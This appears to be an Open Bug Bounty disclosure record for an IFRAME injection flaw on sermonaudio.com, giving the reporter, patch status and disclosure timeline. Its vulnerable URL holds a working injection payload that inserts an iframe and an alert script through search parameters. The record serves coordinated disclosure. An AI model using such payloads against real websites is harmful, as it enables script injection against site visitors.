sermonaudio.com IFRAME Injection vulnerability

2016-03-30T10:17:00
ID OBB:143966
Type openbugbounty
Reporter ahmetomeroglu
Modified 2017-07-27T08:06:00

Description

Vulnerable URL:
http://www.sermonaudio.com/search.asp?speakerWithinSource=%22%3E%3Ciframe%20src=%22https://xssposed.org%22%3E&subsetCat=&subsetItem=&mediatype=&includekeywords=&exactverse=&keyword=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%2C80%2C79%2C83%2C69%2C68+%29%29%2F%2F%27%3B&keyworddesc=B&currsection=&AudioOnly=false&speakerwithin=&x=0&y=0

Details:

Description| Value
---|---
Patched:| Yes, on 27.07.2017
Latest check for patch:| 27.07.2017 08:06 GMT
Vulnerability type:| IFRAME Injection
Vulnerability status:| Publicly disclosed
Alexa Rank| 40361
Google Pagerank| 4
VIP website status:| Yes
Check sermonaudio.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 30 March, 2016 10:17 GMT
Generic security notifications sent to website owner| 30 March, 2016 10:20 GMT
Notification sent to subscribers (without technical details)| 30 March, 2016 14:17 GMT
Vulnerability details disclosed by researcher| 22 June, 2016 11:11 GMT
Vulnerability patched by the website owner| 27 July, 2017 08:06 GMT